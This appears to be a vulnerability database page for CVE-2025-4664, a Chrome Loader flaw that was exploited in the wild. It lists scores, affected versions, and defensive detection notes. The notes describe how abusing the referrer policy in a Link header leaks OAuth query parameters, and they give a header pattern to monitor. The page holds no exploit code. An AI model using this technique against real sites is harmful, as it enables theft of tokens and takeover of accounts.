cbcvebase.
CVE-2025-4664
published 2025-05-14

CVE-2025-4664: Insufficient policy enforcement in Loader in Google Chrome prior to 136.0.7103.113 allowed a remote attacker to leak cross-origin data via a crafted HTML page…

PriorityP274medium4.3CVSS 3.1
AVNACLPRNUIRSUCLINAN
ITWEXPLOITVulnCheck KEV
Exploited in the wild
EPSS
5.33%
91.6th percentile
Insufficient policy enforcement in Loader in Google Chrome prior to 136.0.7103.113 allowed a remote attacker to leak cross-origin data via a crafted HTML page. (Chromium security severity: High)

Affected

9 ranges
VendorProductVersion rangeFixed in
chromiumchromium>= 0 < 136.0.7103.113-1~deb12u1136.0.7103.113-1~deb12u1
chromiumchromium>= 0 < 136.0.7103.113-1136.0.7103.113-1
chromiumchromium>= 0 < 136.0.7103.113-1136.0.7103.113-1
debianchromium< chromium 136.0.7103.113-1~deb12u1 (bookworm)chromium 136.0.7103.113-1~deb12u1 (bookworm)
googlechrome< 136.0.7103.113136.0.7103.113
googlechrome>= 136.0.7103.113 < 136.0.7103.113136.0.7103.113
googlechrome_chrome
msrcmicrosoft_edge
paloaltoprisma_browser

Detection & IOCsextracted from sources · hover to see the quote

  • Chrome's Loader component resolves Link headers on subresource requests; attackers can set referrer-policy to 'unsafe-url' via the Link header to capture full query parameters from cross-origin requests, enabling data leakage and account takeover (e.g., OAuth token theft).
  • Detection focus: monitor for Link response headers on subresource requests containing 'referrer-policy=unsafe-url', which is the mechanism abused to exfiltrate query parameters cross-origin.
  • Exploitation vector is a crafted HTML page delivered remotely; defenders should alert on Chrome versions prior to 136.0.7103.113 (and Edge prior to 136.0.3240.76) accessing untrusted HTML content, as those versions are vulnerable.
  • CVE-2025-4664 is confirmed actively exploited in the wild and listed in CISA's Known Exploited Vulnerabilities catalog; prioritize detection of unpatched Chrome/Edge instances in the environment.
  • Exploitation can lead to full account takeover via OAuth flow query parameter theft; monitor OAuth redirect URIs and authorization code parameters for unexpected referrer leakage to third-party image or subresource origins.
  • ·Google did not initially disclose whether the vulnerability was actively exploited at patch time, only noting a public exploit existed; active exploitation was confirmed by CISA one day after the patch release.
  • ·The Link header referrer-policy abuse vector is specific to Chrome's subresource loader behavior; other browsers do not resolve Link headers on subresource requests in the same way, limiting cross-browser applicability of this attack technique.
  • ·Developers are noted to rarely account for query parameter theft via third-party image subresources, meaning many applications may be silently vulnerable to data leakage even after browser patching if server-side mitigations are not applied.

CVSS provenance

nvdv3.14.3MEDIUMCVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N
osv4.3MEDIUM
vulncheck4.3MEDIUM
vendor_debian4.3MEDIUM
vendor_msrc4.3MEDIUM
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.